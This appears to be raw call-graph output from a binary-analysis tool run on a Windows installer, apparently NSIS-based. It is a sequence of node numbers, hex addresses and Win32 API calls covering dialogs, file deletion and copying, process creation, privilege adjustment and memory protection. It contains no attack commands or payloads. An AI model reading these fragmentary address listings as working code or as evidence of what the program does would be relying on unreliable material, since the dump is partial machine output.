5367->5357 5387 404bd2 5369->5387 5370->5364 5376 404e3a SendMessageA 5370->5376 5377 40506e 5371->5377 5372 404dbe SendMessageA 5372->5359 5378 404eac GlobalFree 5373->5378 5373->5382 5374->5373 5375 405022 5375->5364 5383 405034 ShowWindow GetDlgItem ShowWindow 5375->5383 5380 404e4d 5376->5380 5378->5382 5379 404cac GetWindowLongA SetWindowLongA 5381 404cc5 5379->5381 5391 404e5e SendMessageA 5380->5391 5384 404ce2 5381->5384 5385 404cca ShowWindow 5381->5385 5382->5375 5399 404eee 5382->5399 5410 404a3b 5382->5410 5383->5364 5404 40409d SendMessageA 5384->5404 5403 40409d SendMessageA 5385->5403 5386->5359 5386->5372 5387->5379 5390 404c24 SendMessageA 5387->5390 5392 404ca7 5387->5392 5393 404c62 SendMessageA 5387->5393 5394 404c76 SendMessageA 5387->5394 5390->5387 5391->5361 5392->5379 5392->5381 5393->5387 5394->5387 5396 404ff8 InvalidateRect 5396->5375 5397 40500e 5396->5397 5419 404976 5397->5419 5398 404f1c SendMessageA 5402 404f32 5398->5402 5399->5398 5399->5402 5401 404fa6 SendMessageA SendMessageA 5401->5402 5402->5396 5402->5401 5403->5364 5404->5354 5406 404a1a SendMessageA 5405->5406 5407 4049de GetMessagePos ScreenToClient SendMessageA 5405->5407 5408 404a12 5406->5408 5407->5408 5409 404a17 5407->5409 5408->5386 5409->5406 5422 405fda lstrcpynA 5410->5422 5412 404a4e 5423 405f38 wsprintfA 5412->5423 5414 404a58 5415 40140b 2 API calls 5414->5415 5416 404a61 5415->5416 5424 405fda lstrcpynA 5416->5424 5418 404a68 5418->5399 5425 4048b1 5419->5425 5421 40498b 5421->5375 5422->5412 5423->5414 5424->5418 5426 4048c7 5425->5426 5427 405ffc 17 API calls 5426->5427 5428 40492b 5427->5428 5429 405ffc 17 API calls 5428->5429 5430 404936 5429->5430 5431 405ffc 17 API calls 5430->5431 5432 40494c lstrlenA wsprintfA SetDlgItemTextA 5431->5432 5432->5421 5433 4019ed 5434 402b2c 17 API calls 5433->5434 5435 4019f4 5434->5435 5436 402b2c 17 API calls 5435->5436 5437 4019fd 5436->5437 5438 401a04 lstrcmpiA 5437->5438 5439 401a16 lstrcmpA 5437->5439 5440 401a0a 5438->5440 5439->5440 4397 40156f 4398 401586 4397->4398 4399 40157f ShowWindow 4397->4399 4400 401594 ShowWindow 4398->4400 4401 4029b8 4398->4401 4399->4398 4400->4401 4402 4026ef 4403 4026f6 4402->4403 4405 402965 4402->4405 4404 402b0a 17 API calls 4403->4404 4406 4026fd 4404->4406 4407 40270c SetFilePointer 4406->4407 4407->4405 4408 40271c 4407->4408 4410 405f38 wsprintfA 4408->4410 4410->4405 5448 4014f4 SetForegroundWindow 5449 4029b8 5448->5449 5450 405075 5451 405085 5450->5451 5452 405099 5450->5452 5453 40508b 5451->5453 5462 4050e2 5451->5462 5454 4050a1 IsWindowVisible 5452->5454 5460 4050b8 5452->5460 5456 4040b4 SendMessageA 5453->5456 5457 4050ae 5454->5457 5454->5462 5455 4050e7 CallWindowProcA 5458 405095 5455->5458 5456->5458 5459 4049bb 5 API calls 5457->5459 5459->5460 5460->5455 5461 404a3b 4 API calls 5460->5461 5461->5462 5462->5455 5463 73ef225a 5464 73ef22c4 5463->5464 5465 73ef22cf GlobalAlloc 5464->5465 5466 73ef22ee 5464->5466 5465->5464 5467 73ef1058 5469 73ef1074 5467->5469 5468 73ef10dc 5469->5468 5470 73ef1091 5469->5470 5480 73ef14bb 5469->5480 5472 73ef14bb GlobalFree 5470->5472 5473 73ef10a1 5472->5473 5474 73ef10a8 GlobalSize 5473->5474 5475 73ef10b1 5473->5475 5474->5475 5476 73ef10c6 5475->5476 5477 73ef10b5 GlobalAlloc 5475->5477 5479 73ef10d1 GlobalFree 5476->5479 5478 73ef14e2 3 API calls 5477->5478 5478->5476 5479->5468 5482 73ef14c1 5480->5482 5481 73ef14c7 5481->5470 5482->5481 5483 73ef14d3 GlobalFree 5482->5483 5483->5470 5484 4044fa 5485 404526 5484->5485 5486 404537 5484->5486 5545 4056da GetDlgItemTextA 5485->5545 5488 404543 GetDlgItem 5486->5488 5495 4045a2 5486->5495 5490 404557 5488->5490 5489 404531 5492 406244 5 API calls 5489->5492 5493 40456b SetWindowTextA 5490->5493 5498 405a0b 4 API calls 5490->5498 5491 404686 5494 404830 5491->5494 5547 4056da GetDlgItemTextA 5491->5547 5492->5486 5499 404068 18 API calls 5493->5499 5497 4040cf 8 API calls 5494->5497 5495->5491 5495->5494 5500 405ffc 17 API calls 5495->5500 5502 404844 5497->5502 5503 404561 5498->5503 5504 404587 5499->5504 5505 404616 SHBrowseForFolderA 5500->5505 5501 4046b6 5506 405a60 18 API calls 5501->5506 5503->5493 5512 405972 3 API calls 5503->5512 5507 404068 18 API calls 5504->5507 5505->5491 5508 40462e CoTaskMemFree 5505->5508 5509 4046bc 5506->5509 5510 404595 5507->5510 5511 405972 3 API calls 5508->5511 5548 405fda lstrcpynA 5509->5548 5546 40409d SendMessageA 5510->5546 5514 40463b 5511->5514 5512->5493 5517 404672 SetDlgItemTextA 5514->5517 5521 405ffc 17 API calls 5514->5521 5516 40459b 5519 406372 5 API calls 5516->5519 5517->5491 5518 4046d3 5520 406372 5 API calls 5518->5520 5519->5495 5528 4046da 5520->5528 5522 40465a lstrcmpiA 5521->5522 5522->5517 5525 40466b lstrcatA 5522->5525 5523 404716 5549 405fda lstrcpynA 5523->5549 5525->5517 5526 40471d 5527 405a0b 4 API calls 5526->5527 5529 404723 GetDiskFreeSpaceA 5527->5529 5528->5523 5532 4059b9 2 API calls 5528->5532 5534 40476e 5528->5534 5531 404747 MulDiv 5529->5531 5529->5534 5531->5534 5532->5528 5533 4047df 5536 404802 5533->5536 5538 40140b 2 API calls 5533->5538 5534->5533 5535 404976 20 API calls 5534->5535 5537 4047cc 5535->5537 5550 40408a KiUserCallbackDispatcher 5536->5550 5539 4047e1 SetDlgItemTextA 5537->5539 5540 4047d1 5537->5540 5538->5536 5539->5533 5543 4048b1 20 API calls 5540->5543 5542 40481e 5542->5494 5544 404453 SendMessageA 5542->5544 5543->5533 5544->5494 5545->5489 5546->5516 5547->5501 5548->5518 5549->5526 5550->5542 5551 401cfb 5552 402b0a 17 API calls 5551->5552 5553 401d02 5552->5553 5554 402b0a 17 API calls 5553->5554 5555 401d0e GetDlgItem 5554->5555 5556 4025e4 5555->5556 5556->5556 5557 4018fd 5558 401934 5557->5558 5559 402b2c 17 API calls 5558->5559 5560 401939 5559->5560 5561 4057a2 67 API calls 5560->5561 5562 401942 5561->5562 5563 73ef15d1 5564 73ef14bb GlobalFree 5563->5564 5565 73ef15e9 5564->5565 5566 73ef162f GlobalFree 5565->5566 5567 73ef1604 5565->5567 5568 73ef161b VirtualFree 5565->5568 5567->5566 5568->5566 5569 401dff GetDC 5570 402b0a 17 API calls 5569->5570 5571 401e11 GetDeviceCaps MulDiv ReleaseDC 5570->5571 5572 402b0a 17 API calls 5571->5572 5573 401e42 5572->5573 5574 405ffc 17 API calls 5573->5574 5575 401e7f CreateFontIndirectA 5574->5575 5576 4025e4 5575->5576 5577 401000 5578 401037 BeginPaint GetClientRect 5577->5578 5579 40100c DefWindowProcA 5577->5579 5581 4010f3 5578->5581 5582 401179 5579->5582 5583 401073 CreateBrushIndirect FillRect DeleteObject 5581->5583 5584 4010fc 5581->5584 5583->5581 5585 401102 CreateFontIndirectA 5584->5585 5586 401167 EndPaint 5584->5586 5585->5586 5587 401112 6 API calls 5585->5587 5586->5582 5587->5586 5588 401900 5589 402b2c 17 API calls 5588->5589 5590 401907 5589->5590 5591 4056f6 MessageBoxIndirectA 5590->5591 5592 401910 5591->5592 5593 401502 5594 40151d 5593->5594 5595 40150a 5593->5595 5596 402b0a 17 API calls 5595->5596 5596->5594 5604 401c0a 5605 402b0a 17 API calls 5604->5605 5606 401c11 5605->5606 5607 402b0a 17 API calls 5606->5607 5608 401c1e 5607->5608 5609 401c33 5608->5609 5610 402b2c 17 API calls 5608->5610 5611 401c43 5609->5611 5612 402b2c 17 API calls 5609->5612 5610->5609 5613 401c9a 5611->5613 5614 401c4e 5611->5614 5612->5611 5615 402b2c 17 API calls 5613->5615 5616 402b0a 17 API calls 5614->5616 5618 401c9f 5615->5618 5617 401c53 5616->5617 5619 402b0a 17 API calls 5617->5619 5620 402b2c 17 API calls 5618->5620 5621 401c5f 5619->5621 5622 401ca8 FindWindowExA 5620->5622 5623 401c8a SendMessageA 5621->5623 5624 401c6c SendMessageTimeoutA 5621->5624 5625 401cc6 5622->5625 5623->5625 5624->5625 4394 73ef2921 4395 73ef2971 4394->4395 4396 73ef2931 VirtualProtect 4394->4396 4396->4395 4411 401e8f 4412 402b0a 17 API calls 4411->4412 4413 401e95 4412->4413 4414 402b0a 17 API calls 4413->4414 4415 401ea1 4414->4415 4416 401eb8 EnableWindow 4415->4416 4417 401ead ShowWindow 4415->4417 4418 4029b8 4416->4418 4417->4418 5626 401490 5627 405101 24 API calls 5626->5627 5628 401497 5627->5628 5629 73ef103d 5632 73ef101b 5629->5632 5633 73ef14bb GlobalFree 5632->5633 5634 73ef1020 5633->5634 5635 73ef1027 GlobalAlloc 5634->5635 5636 73ef1024 5634->5636 5635->5636 5637 73ef14e2 3 API calls 5636->5637 5638 73ef103b 5637->5638 5639 402993 SendMessageA 5640 4029b8 5639->5640 5641 4029ad InvalidateRect 5639->5641 5641->5640 4516 403b94 4517 403ce7 4516->4517 4518 403bac 4516->4518 4520 403d38 4517->4520 4521 403cf8 GetDlgItem GetDlgItem 4517->4521 4518->4517 4519 403bb8 4518->4519 4522 403bc3 SetWindowPos 4519->4522 4523 403bd6 4519->4523 4525 403d92 4520->4525 4534 401389 2 API calls 4520->4534 4587 404068 4521->4587 4522->4523 4527 403bf3 4523->4527 4528 403bdb ShowWindow 4523->4528 4530 403ce2 4525->4530 4593 4040b4 4525->4593 4531 403c15 4527->4531 4532 403bfb DestroyWindow 4527->4532 4528->4527 4529 403d22 KiUserCallbackDispatcher 4590 40140b 4529->4590 4537 403c1a SetWindowLongA 4531->4537 4538 403c2b 4531->4538 4536 403ff1 4532->4536 4535 403d6a 4534->4535 4535->4525 4539 403d6e SendMessageA 4535->4539 4536->4530 4545 404022 ShowWindow 4536->4545 4537->4530 4542 403cd4 4538->4542 4543 403c37 GetDlgItem 4538->4543 4539->4530 4540 40140b 2 API calls 4557 403da4 4540->4557 4541 403ff3 DestroyWindow EndDialog 4541->4536 4609 4040cf 4542->4609 4546 403c67 4543->4546 4547 403c4a SendMessageA IsWindowEnabled 4543->4547 4545->4530 4549 403c74 4546->4549 4550 403cbb SendMessageA 4546->4550 4551 403c87 4546->4551 4561 403c6c 4546->4561 4547->4530 4547->4546 4548 405ffc 17 API calls 4548->4557 4549->4550 4549->4561 4550->4542 4554 403ca4 4551->4554 4555 403c8f 4551->4555 4553 404068 18 API calls 4553->4557 4559 40140b 2 API calls 4554->4559 4558 40140b 2 API calls 4555->4558 4556 403ca2 4556->4542 4557->4530 4557->4540 4557->4541 4557->4548 4557->4553 4562 404068 18 API calls 4557->4562 4578 403f33 DestroyWindow 4557->4578 4558->4561 4560 403cab 4559->4560 4560->4542 4560->4561 4606 404041 4561->4606 4563 403e1f GetDlgItem 4562->4563 4564 403e34 4563->4564 4565 403e3c ShowWindow KiUserCallbackDispatcher 4563->4565 4564->4565 4596 40408a KiUserCallbackDispatcher 4565->4596 4567 403e66 EnableWindow 4572 403e7a 4567->4572 4568 403e7f GetSystemMenu EnableMenuItem SendMessageA 4569 403eaf SendMessageA 4568->4569 4568->4572 4569->4572 4572->4568 4597 40409d SendMessageA 4572->4597 4598 403b75 4572->4598 4601 405fda lstrcpynA 4572->4601 4574 403ede lstrlenA 4575 405ffc 17 API calls 4574->4575 4576 403eef SetWindowTextA 4575->4576 4602 401389 4576->4602 4578->4536 4579 403f4d CreateDialogParamA 4578->4579 4579->4536 4580 403f80 4579->4580 4581 404068 18 API calls 4580->4581 4582 403f8b GetDlgItem GetWindowRect ScreenToClient SetWindowPos 4581->4582 4583 401389 2 API calls 4582->4583 4584 403fd1 4583->4584 4584->4530 4585 403fd9 ShowWindow 4584->4585 4586 4040b4 SendMessageA 4585->4586 4586->4536 4588 405ffc 17 API calls 4587->4588 4589 404073 SetDlgItemTextA 4588->4589 4589->4529 4591 401389 2 API calls 4590->4591 4592 401420 4591->4592 4592->4520 4594 4040cc 4593->4594 4595 4040bd SendMessageA 4593->4595 4594->4557 4595->4594 4596->4567 4597->4572 4599 405ffc 17 API calls 4598->4599 4600 403b83 SetWindowTextA 4599->4600 4600->4572 4601->4574 4604 401390 4602->4604 4603 4013fe 4603->4557 4604->4603 4605 4013cb MulDiv SendMessageA 4604->4605 4605->4604 4607 404048 4606->4607 4608 40404e SendMessageA 4606->4608 4607->4608 4608->4556 4610 404192 4609->4610 4611 4040e7 GetWindowLongA 4609->4611 4610->4530 4611->4610 4612 4040fc 4611->4612 4612->4610 4613 404129 GetSysColor 4612->4613 4614 40412c 4612->4614 4613->4614 4615 404132 SetTextColor 4614->4615 4616 40413c SetBkMode 4614->4616 4615->4616 4617 404154 GetSysColor 4616->4617 4618 40415a 4616->4618 4617->4618 4619 404161 SetBkColor 4618->4619 4620 40416b 4618->4620 4619->4620 4620->4610 4621 404185 CreateBrushIndirect 4620->4621 4622 40417e DeleteObject 4620->4622 4621->4610 4622->4621 5642 73ef1638 5643 73ef1667 5642->5643 5644 73ef1a98 18 API calls 5643->5644 5645 73ef166e 5644->5645 5646 73ef1675 5645->5646 5647 73ef1681 5645->5647 5648 73ef1266 2 API calls 5646->5648 5649 73ef168b 5647->5649 5650 73ef16a8 5647->5650 5651 73ef167f 5648->5651 5652 73ef14e2 3 API calls 5649->5652 5653 73ef16ae 5650->5653 5654 73ef16d2 5650->5654 5656 73ef1690 5652->5656 5657 73ef1559 3 API calls 5653->5657 5655 73ef14e2 3 API calls 5654->5655 5655->5651 5659 73ef1559 3 API calls 5656->5659 5658 73ef16b3 5657->5658 5660 73ef1266 2 API calls 5658->5660 5661 73ef1696 5659->5661 5662 73ef16b9 GlobalFree 5660->5662 5663 73ef1266 2 API calls 5661->5663 5662->5651 5664 73ef16cd GlobalFree 5662->5664 5665 73ef169c GlobalFree 5663->5665 5664->5651 5665->5651 5666 73ef1837 5668 73ef185a 5666->5668 5667 73ef189c __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z __allrem 5670 73ef1266 2 API calls 5667->5670 5668->5667 5669 73ef188a GlobalFree 5668->5669 5669->5667 5671 73ef1a1e GlobalFree GlobalFree 5670->5671 5672 401f98 5673 402b2c 17 API calls 5672->5673 5674 401f9f 5673->5674 5675 4062dd 2 API calls 5674->5675 5676 401fa5 5675->5676 5678 401fb7 5676->5678 5679 405f38 wsprintfA 5676->5679 5679->5678 5031 40159d 5032 402b2c 17 API calls 5031->5032 5033 4015a4 SetFileAttributesA 5032->5033 5034 4015b6 5033->5034 5694 40149d 5695 4014ab PostQuitMessage 5694->5695 5696 40234e 5694->5696 5695->5696 5035 401a1e 5036 402b2c 17 API calls 5035->5036 5037 401a27 ExpandEnvironmentStringsA 5036->5037 5038 401a3b 5037->5038 5039 401a4e 5037->5039 5038->5039 5040 401a40 lstrcmpA 5038->5040 5040->5039 5702 40289e 5703 402b0a 17 API calls 5702->5703 5704 4028a4 5703->5704 5705 4028e3 5704->5705 5706 4028cc 5704->5706 5714 402783 5704->5714 5707 4028fd 5705->5707 5708 4028ed 5705->5708 5711 4028d1 5706->5711 5712 4028e0 5706->5712 5710 405ffc 17 API calls 5707->5710 5709 402b0a 17 API calls 5708->5709 5709->5712 5710->5712 5716 405fda lstrcpynA 5711->5716 5712->5714 5717 405f38 wsprintfA 5712->5717 5716->5714 5717->5714 5718 40419e lstrcpynA lstrlenA 5719 40171f 5720 402b2c 17 API calls 5719->5720 5721 401726 SearchPathA 5720->5721 5722 401741 5721->5722 5723 401d20 5724 402b0a 17 API calls 5723->5724 5725 401d2e SetWindowLongA 5724->5725 5726 4029b8 5725->5726 5727 402721 5728 402727 5727->5728 5729 4029b8 5728->5729 5730 40272f FindClose 5728->5730 5730->5729 5738 4027a3 5739 402b2c 17 API calls 5738->5739 5740 4027b1 5739->5740 5741 4027c7 5740->5741 5742 402b2c 17 API calls 5740->5742 5743 405b4e 2 API calls 5741->5743 5742->5741 5744 4027cd 5743->5744 5766 405b73 GetFileAttributesA CreateFileA 5744->5766 5746 4027da 5747 4027e6 GlobalAlloc 5746->5747 5748 40287d 5746->5748 5749 402874 CloseHandle 5747->5749 5750 4027ff 5747->5750 5751 402885 DeleteFileA 5748->5751 5752 402898 5748->5752 5749->5748 5767 4031ed SetFilePointer 5750->5767 5751->5752 5754 402805 5755 4031d7 ReadFile 5754->5755 5756 40280e GlobalAlloc 5755->5756 5757 402852 5756->5757 5758 40281e 5756->5758 5760 405c1a WriteFile 5757->5760 5759 402ffb 35 API calls 5758->5759 5763 40282b 5759->5763 5761 40285e GlobalFree 5760->5761 5762 402ffb 35 API calls 5761->5762 5764 402871 5762->5764 5765 402849 GlobalFree 5763->5765 5764->5749 5765->5757 5766->5746 5767->5754 5768 4023a7 5769 402b2c 17 API calls 5768->5769 5770 4023b8 5769->5770 5771 402b2c 17 API calls 5770->5771 5772 4023c1 5771->5772 5773 402b2c 17 API calls 5772->5773 5774 4023cb GetPrivateProfileStringA 5773->5774 5775 40292c 5776 402b0a 17 API calls 5775->5776 5777 402932 5776->5777 5778 402967 5777->5778 5779 402783 5777->5779 5781 402944 5777->5781 5778->5779 5780 405ffc 17 API calls 5778->5780 5780->5779 5781->5779 5783 405f38 wsprintfA 5781->5783 5783->5779 5784 73ef1000 5785 73ef101b 5 API calls 5784->5785 5786 73ef1019 5785->5786 4419 402631 4420 402b0a 17 API calls 4419->4420 4424 40263b 4420->4424 4421 4026a9 4422 405beb ReadFile 4422->4424 4423 4026ab 4428 405f38 wsprintfA 4423->4428 4424->4421 4424->4422 4424->4423 4425 4026bb 4424->4425 4425->4421 4427 4026d1 SetFilePointer 4425->4427 4427->4421 4428->4421 4429 401932 4430 401934 4429->4430 4431 402b2c 17 API calls 4430->4431 4432 401939 4431->4432 4435 4057a2 4432->4435 4475 405a60 4435->4475 4438 4057e1 4441 405919 4438->4441 4489 405fda lstrcpynA 4438->4489 4439 4057ca DeleteFileA 4440 401942 4439->4440 4441->4440 4446 4062dd 2 API calls 4441->4446 4443 405807 4444 40581a 4443->4444 4445 40580d lstrcatA 4443->4445 4490 4059b9 lstrlenA 4444->4490 4447 405820 4445->4447 4449 405933 4446->4449 4450 40582e lstrcatA 4447->4450 4452 405839 lstrlenA FindFirstFileA 4447->4452 4449->4440 4451 405937 4449->4451 4450->4452 4503 405972 lstrlenA CharPrevA 4451->4503 4453 40590f 4452->4453 4473 40585d 4452->4473 4453->4441 4455 40599d CharNextA 4455->4473 4457 40575a 5 API calls 4458 405949 4457->4458 4459 405963 4458->4459 4460 40594d 4458->4460 4461 405101 24 API calls 4459->4461 4460->4440 4465 405101 24 API calls 4460->4465 4461->4440 4462 4058ee FindNextFileA 4464 405906 FindClose 4462->4464 4462->4473 4464->4453 4466 40595a 4465->4466 4468 405db9 36 API calls 4466->4468 4469 405961 4468->4469 4469->4440 4470 4057a2 60 API calls 4470->4473 4471 405101 24 API calls 4471->4462 4472 405101 24 API calls 4472->4473 4473->4455 4473->4462 4473->4470 4473->4471 4473->4472 4474 405db9 36 API calls 4473->4474 4494 405fda lstrcpynA 4473->4494 4495 40575a 4473->4495 4474->4473 4506 405fda lstrcpynA 4475->4506 4477 405a71 4507 405a0b CharNextA CharNextA 4477->4507 4480 4057c2 4480->4438 4480->4439 4481 406244 5 API calls 4487 405a87 4481->4487 4482 405ab2 lstrlenA 4483 405abd 4482->4483 4482->4487 4484 405972 3 API calls 4483->4484 4486 405ac2 GetFileAttributesA 4484->4486 4485 4062dd 2 API calls 4485->4487 4486->4480 4487->4480 4487->4482 4487->4485 4488 4059b9 2 API calls 4487->4488 4488->4482 4489->4443 4491 4059c6 4490->4491 4492 4059d7 4491->4492 4493 4059cb CharPrevA 4491->4493 4492->4447 4493->4491 4493->4492 4494->4473 4513 405b4e GetFileAttributesA 4495->4513 4498 405775 RemoveDirectoryA 4500 405783 4498->4500 4499 40577d DeleteFileA 4499->4500 4501 405787 4500->4501 4502 405793 SetFileAttributesA 4500->4502 4501->4473 4502->4501 4504 40593d 4503->4504 4505 40598c lstrcatA 4503->4505 4504->4457 4505->4504 4506->4477 4508 405a26 4507->4508 4511 405a36 4507->4511 4510 405a31 CharNextA 4508->4510 4508->4511 4509 405a56 4509->4480 4509->4481 4510->4509 4511->4509 4512 40599d CharNextA 4511->4512 4512->4511 4514 405b60 SetFileAttributesA 4513->4514 4515 405766 4513->4515 4514->4515 4515->4498 4515->4499 4515->4501 5787 4022b2 5788 402b2c 17 API calls 5787->5788 5789 4022b8 5788->5789 5790 402b2c 17 API calls 5789->5790 5791 4022c1 5790->5791 5792 402b2c 17 API calls 5791->5792 5793 4022ca 5792->5793 5794 4062dd 2 API calls 5793->5794 5795 4022d3 5794->5795 5796 4022e4 lstrlenA lstrlenA 5795->5796 5797 4022d7 5795->5797 5799 405101 24 API calls 5796->5799 5798 405101 24 API calls 5797->5798 5801 4022df 5797->5801 5798->5801 5800 402320 SHFileOperationA 5799->5800 5800->5797 5800->5801 5809 4044b3 5810 4044c3 5809->5810 5811 4044e9 5809->5811 5812 404068 18 API calls 5810->5812 5813 4040cf 8 API calls 5811->5813 5814 4044d0 SetDlgItemTextA 5812->5814 5815 4044f5 5813->5815 5814->5811 5816 402334 5817 40233b 5816->5817 5820 40234e 5816->5820 5818 405ffc 17 API calls 5817->5818 5819 402348 5818->5819 5819->5820 5821 4056f6 MessageBoxIndirectA 5819->5821 5821->5820 4623 403235 SetErrorMode GetVersion 4624 403276 4623->4624 4625 40327c 4623->4625 4626 406372 5 API calls 4624->4626 4713 406304 GetSystemDirectoryA 4625->4713 4626->4625 4628 403292 lstrlenA 4628->4625 4629 4032a1 4628->4629 4716 406372 GetModuleHandleA 4629->4716 4632 406372 5 API calls 4633 4032af 4632->4633 4634 406372 5 API calls 4633->4634 4635 4032bb #17 OleInitialize SHGetFileInfoA 4634->4635 4722 405fda lstrcpynA 4635->4722 4638 403307 GetCommandLineA 4723 405fda lstrcpynA 4638->4723 4640 403319 4641 40599d CharNextA 4640->4641 4642 403342 CharNextA 4641->4642 4647 403352 4642->4647 4643 40341c 4644 40342f GetTempPathA 4643->4644 4724 403204 4644->4724 4646 403447 4648 4034a1 DeleteFileA 4646->4648 4649 40344b GetWindowsDirectoryA lstrcatA 4646->4649 4647->4643 4650 40599d CharNextA 4647->4650 4655 40341e 4647->4655 4734 402dc4 GetTickCount GetModuleFileNameA 4648->4734 4652 403204 12 API calls 4649->4652 4650->4647 4654 403467 4652->4654 4653 4034b5 4656 40354b 4653->4656 4659 40353b 4653->4659 4663 40599d CharNextA 4653->4663 4654->4648 4658 40346b GetTempPathA lstrcatA SetEnvironmentVariableA SetEnvironmentVariableA 4654->4658 4818 405fda lstrcpynA 4655->4818 4821 40371d 4656->4821 4661 403204 12 API calls 4658->4661 4762 4037f7 4659->4762 4665 403499 4661->4665 4666 4034d0 4663->4666 4665->4648 4665->4656 4673 403516 4666->4673 4674 40357b 4666->4674 4667 403683 4670 403705 ExitProcess 4667->4670 4671 40368b GetCurrentProcess OpenProcessToken 4667->4671 4668 403565 4828 4056f6 4668->4828 4676 4036d6 4671->4676 4677 4036a6 LookupPrivilegeValueA AdjustTokenPrivileges 4671->4677 4679 405a60 18 API calls 4673->4679 4832 405661 4674->4832 4678 406372 5 API calls 4676->4678 4677->4676 4681 4036dd 4678->4681 4682 403521 4679->4682 4684 4036f2 ExitWindowsEx 4681->4684 4688 4036fe 4681->4688 4682->4656 4819 405fda lstrcpynA 4682->4819 4684->4670 4684->4688 4685 403591 lstrcatA 4686 40359c lstrcatA lstrcmpiA 4685->4686 4686->4656 4687 4035b8 4686->4687 4690 4035c4 4687->4690 4691 4035bd 4687->4691 4692 40140b 2 API calls 4688->4692 4840 405644 CreateDirectoryA 4690->4840 4835 4055c7 CreateDirectoryA 4691->4835 4692->4670 4693 403530 4820 405fda lstrcpynA 4693->4820 4698 4035c9 SetCurrentDirectoryA 4699 4035e3 4698->4699 4700 4035d8 4698->4700 4844 405fda lstrcpynA 4699->4844 4843 405fda lstrcpynA 4700->4843 4703 405ffc 17 API calls 4704 403622 DeleteFileA 4703->4704 4705 40362f CopyFileA 4704->4705 4710 4035f1 4704->4710 4705->4710 4706 403677 4708 405db9 36 API calls 4706->4708 4707 405db9 36 API calls 4707->4710 4708->4656 4709 405ffc 17 API calls 4709->4710 4710->4703 4710->4706 4710->4707 4710->4709 4712 403663 CloseHandle 4710->4712 4845 405679 CreateProcessA 4710->4845 4712->4710 4714 406326 wsprintfA LoadLibraryExA 4713->4714 4714->4628 4717 406398 GetProcAddress 4716->4717 4718 40638e 4716->4718 4720 4032a8 4717->4720 4719 406304 3 API calls 4718->4719 4721 406394 4719->4721 4720->4632 4721->4717 4721->4720 4722->4638 4723->4640 4725 406244 5 API calls 4724->4725 4727 403210 4725->4727 4726 40321a 4726->4646 4727->4726 4728 405972 3 API calls 4727->4728 4729 403222 4728->4729 4730 405644 2 API calls 4729->4730 4731 403228 4730->4731 4732 405ba2 2 API calls 4731->4732 4733 403233 4732->4733 4733->4646 4848 405b73 GetFileAttributesA CreateFileA 4734->4848 4736 402e04 4755 402e14 4736->4755 4849 405fda lstrcpynA 4736->4849 4738 402e2a 4739 4059b9 2 API calls 4738->4739 4740 402e30 4739->4740 4850 405fda lstrcpynA 4740->4850 4742 402e3b GetFileSize 4743 402f35 4742->4743 4761 402e52 4742->4761 4851 402d60 4743->4851 4745 402f3e 4747 402f6e GlobalAlloc 4745->4747 4745->4755 4887 4031ed SetFilePointer 4745->4887 4862 4031ed SetFilePointer 4747->4862 4748 402fa1 4752 402d60 6 API calls 4748->4752 4751 402f89 4863 402ffb 4751->4863 4752->4755 4753 402f57 4756 4031d7 ReadFile 4753->4756 4755->4653 4758 402f62 4756->4758 4757 402d60 6 API calls 4757->4761 4758->4747 4758->4755 4759 402f95 4759->4755 4759->4759 4760 402fd2 SetFilePointer 4759->4760 4760->4755 4761->4743 4761->4748 4761->4755 4761->4757 4884 4031d7 4761->4884 4763 406372 5 API calls 4762->4763 4764 40380b 4763->4764 4765 403811 4764->4765 4766 403823 4764->4766 4915 405f38 wsprintfA 4765->4915 4767 405ec1 3 API calls 4766->4767 4768 40384e 4767->4768 4769 40386c lstrcatA 4768->4769 4771 405ec1 3 API calls 4768->4771 4772 403821 4769->4772 4771->4769 4900 403abc 4772->4900 4775 405a60 18 API calls 4776 40389e 4775->4776 4777 403927 4776->4777 4779 405ec1 3 API calls 4776->4779 4778 405a60 18 API calls 4777->4778 4780 40392d 4778->4780 4781 4038ca 4779->4781 4782 40393d LoadImageA 4780->4782 4783 405ffc 17 API calls 4780->4783 4781->4777 4788 4038e6 lstrlenA 4781->4788 4789 40599d CharNextA 4781->4789 4784 4039e3 4782->4784 4785 403964 RegisterClassA 4782->4785 4783->4782 4787 40140b 2 API calls 4784->4787 4786 40399a SystemParametersInfoA CreateWindowExA 4785->4786 4817 4039ed 4785->4817 4786->4784 4792 4039e9 4787->4792 4790 4038f4 lstrcmpiA 4788->4790 4791 40391a 4788->4791 4793 4038e4 4789->4793 4790->4791 4794 403904 GetFileAttributesA 4790->4794 4795 405972 3 API calls 4791->4795 4797 403abc 18 API calls 4792->4797 4792->4817 4793->4788 4796 403910 4794->4796 4798 403920 4795->4798 4796->4791 4799 4059b9 2 API calls 4796->4799 4800 4039fa 4797->4800 4916 405fda lstrcpynA 4798->4916 4799->4791 4802 403a06 ShowWindow 4800->4802 4803 403a89 4800->4803 4805 406304 3 API calls 4802->4805 4908 4051d3 OleInitialize 4803->4908 4807 403a1e 4805->4807 4806 403a8f 4808 403a93 4806->4808 4809 403aab 4806->4809 4810 403a2c GetClassInfoA 4807->4810 4814 406304 3 API calls 4807->4814 4816 40140b 2 API calls 4808->4816 4808->4817 4813 40140b 2 API calls 4809->4813 4811 403a40 GetClassInfoA RegisterClassA 4810->4811 4812 403a56 DialogBoxParamA 4810->4812 4811->4812 4815 40140b 2 API calls 4812->4815 4813->4817 4814->4810 4815->4817 4816->4817 4817->4656 4818->4644 4819->4693 4820->4659 4822 403735 4821->4822 4823 403727 CloseHandle 4821->4823 4918 403762 4822->4918 4823->4822 4826 4057a2 67 API calls 4827 403554 OleUninitialize 4826->4827 4827->4667 4827->4668 4829 40570b 4828->4829 4830 403573 ExitProcess 4829->4830 4831 40571f MessageBoxIndirectA 4829->4831 4831->4830 4833 406372 5 API calls 4832->4833 4834 403580 lstrcatA 4833->4834 4834->4685 4834->4686 4836 4035c2 4835->4836 4837 405618 GetLastError 4835->4837 4836->4698 4837->4836 4838 405627 SetFileSecurityA 4837->4838 4838->4836 4839 40563d GetLastError 4838->4839 4839->4836 4841 405654 4840->4841 4842 405658 GetLastError 4840->4842 4841->4698 4842->4841 4843->4699 4844->4710 4846 4056b8 4845->4846 4847 4056ac CloseHandle 4845->4847 4846->4710 4847->4846 4848->4736 4849->4738 4850->4742 4852 402d81 4851->4852 4853 402d69 4851->4853 4854 402d91 GetTickCount 4852->4854 4855 402d89 4852->4855 4856 402d72 DestroyWindow 4853->4856 4857 402d79 4853->4857 4859 402dc2 4854->4859 4860 402d9f CreateDialogParamA ShowWindow 4854->4860 4888 4063ae 4855->4888 4856->4857 4857->4745 4859->4745 4860->4859 4862->4751 4865 403011 4863->4865 4864 40303c 4867 4031d7 ReadFile 4864->4867 